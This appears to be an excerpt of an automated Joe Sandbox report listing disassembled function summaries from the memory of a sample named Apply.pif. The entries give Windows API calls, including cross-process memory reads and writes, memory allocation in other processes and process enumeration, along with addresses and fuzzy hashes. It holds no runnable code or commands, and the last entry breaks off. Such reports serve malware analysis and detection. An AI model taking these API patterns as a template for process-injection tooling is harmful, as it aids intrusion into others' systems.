                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                    • API String ID: 535116098-3733170431
                                                    • Opcode ID: 2334de15dd8386cb13ee05ec5373313119edf91961d7fd1d59f22a7222b23ec2
                                                    • Instruction ID: 6a59c28eaa4f36145bcc17acabcc4ab7952abcedfe0051994052e9758e520327
                                                    • Opcode Fuzzy Hash: 2334de15dd8386cb13ee05ec5373313119edf91961d7fd1d59f22a7222b23ec2
                                                    • Instruction Fuzzy Hash: F6915970A00209EFCB14EF98D8919ADB7B2FF48704B14825AF906EB391DB719E45CB52
                                                    APIs
                                                      • Part of subcall function 008BBB04: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008B28B2,?,?,00000034,00000800,?,00000034), ref: 008BBB2E
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008B2E42
                                                      • Part of subcall function 008BBACF: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008B28E1,?,?,00000800,?,00001073,00000000,?,?), ref: 008BBAF9
                                                      • Part of subcall function 008BBA2B: GetWindowThreadProcessId.USER32(?,?), ref: 008BBA56
                                                      • Part of subcall function 008BBA2B: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008B2876,00000034,?,?,00001004,00000000,00000000), ref: 008BBA66
                                                      • Part of subcall function 008BBA2B: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008B2876,00000034,?,?,00001004,00000000,00000000), ref: 008BBA7C
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008B2EAF
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008B2EFC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: f4208063aa52cf483525dd122a0c3c03158cb80ab55606f9b6c2ab2af5d95113
                                                    • Instruction ID: d7fe32aaddba3109f507d19e148b116a67eb9a52a1ed0b20149d26bc609f0a7e
                                                    • Opcode Fuzzy Hash: f4208063aa52cf483525dd122a0c3c03158cb80ab55606f9b6c2ab2af5d95113
                                                    • Instruction Fuzzy Hash: 3E412E76901218AFDB11DFA8CC85AEEB7B8FF05300F004055FA45B7291DB71AE89CB61
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif,00000104), ref: 00881A29
                                                    • _free.LIBCMT ref: 00881AF4
                                                    • _free.LIBCMT ref: 00881AFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                    • API String ID: 2506810119-3516114297
                                                    • Opcode ID: da60bf60cc0c0e33b04d826a906d141d4a9f1fb53236ff2699e4738b34d1ccc5
                                                    • Instruction ID: cc07cbe4681baa4e96933efb4091a5d54897dbc095bc8a4a08adf0ae60d02149
                                                    • Opcode Fuzzy Hash: da60bf60cc0c0e33b04d826a906d141d4a9f1fb53236ff2699e4738b34d1ccc5
                                                    • Instruction Fuzzy Hash: 2E319E71A05228EFDB25EB99DC88C9EBBBCFF84710B104066E804E7210DA709E42DB91
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008BC8EB
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 008BC931
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009229B0,01589310), ref: 008BC97A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    • Opcode ID: fdccabdce5a467c118395a8afac5bc7b51195f31d51c6d1955e84604dfbe10c4
                                                    • Instruction ID: 558208bb7af84fea24ef9eb13c71cdd7557b4b8123bc4b477bbfb4a7a45b91a1
                                                    • Opcode Fuzzy Hash: fdccabdce5a467c118395a8afac5bc7b51195f31d51c6d1955e84604dfbe10c4
                                                    • Instruction Fuzzy Hash: 75417E312043419FE720DF28C885F9ABBE4FB85324F14462EF9A5DB391DB30A904CB66
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008EDC1C,00000000,?,?,?,?), ref: 008E4C6A
                                                    • GetWindowLongW.USER32 ref: 008E4C87
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E4C97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: 83723c668828c19352df6db72e4681487d746f9e4a0c95a6c8f358e973b473a5
                                                    • Instruction ID: 6a4c8302d3de8b7ff44b3f60dccb214acbbb4dfd449ce2792b2443a1c39b76eb
                                                    • Opcode Fuzzy Hash: 83723c668828c19352df6db72e4681487d746f9e4a0c95a6c8f358e973b473a5
                                                    • Instruction Fuzzy Hash: DF31CD31200649ABDB118F39CC85BEA7BA9FB09334F204724F979D32E1DB70AC559B50
                                                    APIs
                                                      • Part of subcall function 008D3AE2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,008D37FE,?,?), ref: 008D3AFF
                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008D3801
                                                    • _wcslen.LIBCMT ref: 008D3822
                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 008D388D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 946324512-2422070025
                                                    • Opcode ID: 40fcf67837092af9e214a3f6abc8dd00e7c759b3275510a982473cf65ccb4dfb
                                                    • Instruction ID: 0a6df737b104d513854196f06108316b5f6e0a1dad01033b5fb1703a1d485852
                                                    • Opcode Fuzzy Hash: 40fcf67837092af9e214a3f6abc8dd00e7c759b3275510a982473cf65ccb4dfb
                                                    • Instruction Fuzzy Hash: CC31CF35600201DFCB10CF68C485A697BE1FF14318F2482AAF816CB3A2C771EE45DB62
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008E46FE
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008E4712
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 008E4736
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: 421ff60088b22461a842300880a5a21d05f3d484884f9dd79c7adad838bbea35
                                                    • Instruction ID: 092df2c96e9eba01281ca7fe1cb4ca39b8c020a7d18b5b1d14f1c9769741cd96
                                                    • Opcode Fuzzy Hash: 421ff60088b22461a842300880a5a21d05f3d484884f9dd79c7adad838bbea35
                                                    • Instruction Fuzzy Hash: A721D332600258BBDF118F95CC82FEA3BA5FF49714F110114FE19AB1D0D6B1A8559B90
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008E4EC5
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008E4ED3
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008E4EDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 107bc8db11c77e8bbdc1ab6a6f76839ba364ac5b8c3b7d2d61bc575098ae2d76
                                                    • Instruction ID: d858f5b3ef869bd27701f7eff01ff5c03ed1782ab055895936fc38f0efd38e01
                                                    • Opcode Fuzzy Hash: 107bc8db11c77e8bbdc1ab6a6f76839ba364ac5b8c3b7d2d61bc575098ae2d76
                                                    • Instruction Fuzzy Hash: D42189B5600249BFEB10DF69DCC1DBB37ACFB4A3A8B000059FA05DB261CB31EC519A60
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 008C5177
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008C51CB
                                                    • SetErrorMode.KERNEL32(00000000,?,?,008EDC1C), ref: 008C523F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume
                                                    • String ID: %lu
                                                    • API String ID: 2507767853-685833217
                                                    • Opcode ID: 55ce04208e58e93ed1bc6144c441b03aab60c52c1f311be9a76407d809f9ba25
                                                    • Instruction ID: 478eaad937ef7db906e9f73455d44c0b1db1218866657dd3f6f539cf61087da8
                                                    • Opcode Fuzzy Hash: 55ce04208e58e93ed1bc6144c441b03aab60c52c1f311be9a76407d809f9ba25
                                                    • Instruction Fuzzy Hash: 28311275A00219AFDB11DF58C985EAAB7F8FF04304F144099E909DB352D771EE46CB61
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008E4A0F
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008E4A24
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008E4A31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 20aef1bef133ed74e731981d9e873bf9340beaa8d2e5395adc5d182eb9bf5184
                                                    • Instruction ID: 09042f9ac74f197ee63c14268b1496cd3f86e8f8826e3ad5b31e800621504494
                                                    • Opcode Fuzzy Hash: 20aef1bef133ed74e731981d9e873bf9340beaa8d2e5395adc5d182eb9bf5184
                                                    • Instruction Fuzzy Hash: A7110631280288BEEF205F2ACC46FEB3BACFF86B64F010524FA55E71A1D671D8519B14
                                                    APIs
                                                      • Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A
                                                      • Part of subcall function 008B3489: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008B34A7
                                                      • Part of subcall function 008B3489: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B34B8
                                                      • Part of subcall function 008B3489: GetCurrentThreadId.KERNEL32 ref: 008B34BF
                                                      • Part of subcall function 008B3489: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008B34C6
                                                    • GetFocus.USER32 ref: 008B3659
                                                      • Part of subcall function 008B34D0: GetParent.USER32(00000000), ref: 008B34DB
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 008B36A4
                                                    • EnumChildWindows.USER32(?,008B371C), ref: 008B36CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                    • String ID: %s%d
                                                    • API String ID: 1272988791-1110647743
                                                    • Opcode ID: 97f7669fd195c88f3801b46123f91b45c5547971190d50b7bd7d6e6145e3830f
                                                    • Instruction ID: 773bf888eea5fe6b942e7abd01dc6a06b497733cbc43ffc79174d830d1f58636
                                                    • Opcode Fuzzy Hash: 97f7669fd195c88f3801b46123f91b45c5547971190d50b7bd7d6e6145e3830f
                                                    • Instruction Fuzzy Hash: 921193B56002096BCF127FA49CC5AEA3B6AFF94304F044075FD09DB393DE719A498B65
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E6081
                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E60AE
                                                    • DrawMenuBar.USER32(?), ref: 008E60BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw
                                                    • String ID: 0
                                                    • API String ID: 3227129158-4108050209
                                                    • Opcode ID: d3145e25130d2cdd84b1feec9509fb7bafe7c6a069a8b81d59453d48ed7a510b
                                                    • Instruction ID: f01d5ea07c5ef4e30144bc1725276167345cb0a3728cee18780012f53264747a
                                                    • Opcode Fuzzy Hash: d3145e25130d2cdd84b1feec9509fb7bafe7c6a069a8b81d59453d48ed7a510b
                                                    • Instruction Fuzzy Hash: 59016931500298EFDB619F56DC84BAA7BB4FB06354F1480A9E849EA150DB318A98EF21
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cf043f8baba7f2efa3e804c9d86677a2fc7c1a1ce7bb704aba8d095a34e647da
                                                    • Instruction ID: e54b9f9bdce6e6928877058eeabdee53d29658a5cda336962c7e572feb5dec89
                                                    • Opcode Fuzzy Hash: cf043f8baba7f2efa3e804c9d86677a2fc7c1a1ce7bb704aba8d095a34e647da
                                                    • Instruction Fuzzy Hash: 10C12875A0021AEFDB14CF94C894AAABBB5FF48704F248598E905EB351D731EE81CF90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                    • Instruction ID: 5916ba13736e2a4cea3dcd36d7bd227408662086c24f8703c785467efaa8c45e
                                                    • Opcode Fuzzy Hash: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                    • Instruction Fuzzy Hash: 0FA14533A0538B9FEB21EF58C881BAEBBE5FF11310F184169E585DB282C3789941C755
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008F0BF0,?), ref: 008B0C77
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008F0BF0,?), ref: 008B0C8F
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,008EDC2C,000000FF,?,00000000,00000800,00000000,?,008F0BF0,?), ref: 008B0CB4
                                                    • _memcmp.LIBVCRUNTIME ref: 008B0CD5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID:
                                                    • API String ID: 314563124-0
                                                    • Opcode ID: bb1099f413acee078527a7db34b007ac48692979823a6ed05a11170dd47cdc4e
                                                    • Instruction ID: 2a5b5df03a8a67dc39cbce3baddfdce65fe68d97b39e4cf3f9bdc88f69053e1d
                                                    • Opcode Fuzzy Hash: bb1099f413acee078527a7db34b007ac48692979823a6ed05a11170dd47cdc4e
                                                    • Instruction Fuzzy Hash: C081E871A00109EFCB04DF94C994EEEBBB9FF89315F204558E506EB251DB71AE09CB61
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 008DAE33
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 008DAE41
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 008DAF23
                                                    • CloseHandle.KERNEL32(00000000), ref: 008DAF32
                                                      • Part of subcall function 0086E224: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00893B5C,?), ref: 0086E24E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                    • String ID:
                                                    • API String ID: 1991900642-0
                                                    • Opcode ID: 5faa8040867228d6a0e2cb99e5a10bfb11c489a35f22735bd43a750eafff9214
                                                    • Instruction ID: d3244ae194276ddf8e9208b078e78291f61f09680b1d274cee90557d72fc1f80
                                                    • Opcode Fuzzy Hash: 5faa8040867228d6a0e2cb99e5a10bfb11c489a35f22735bd43a750eafff9214
                                                    • Instruction Fuzzy Hash: CD51F9B15083419FC714EF28D886A5BBBE8FF89714F40491DF995D7291EB30D909CB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
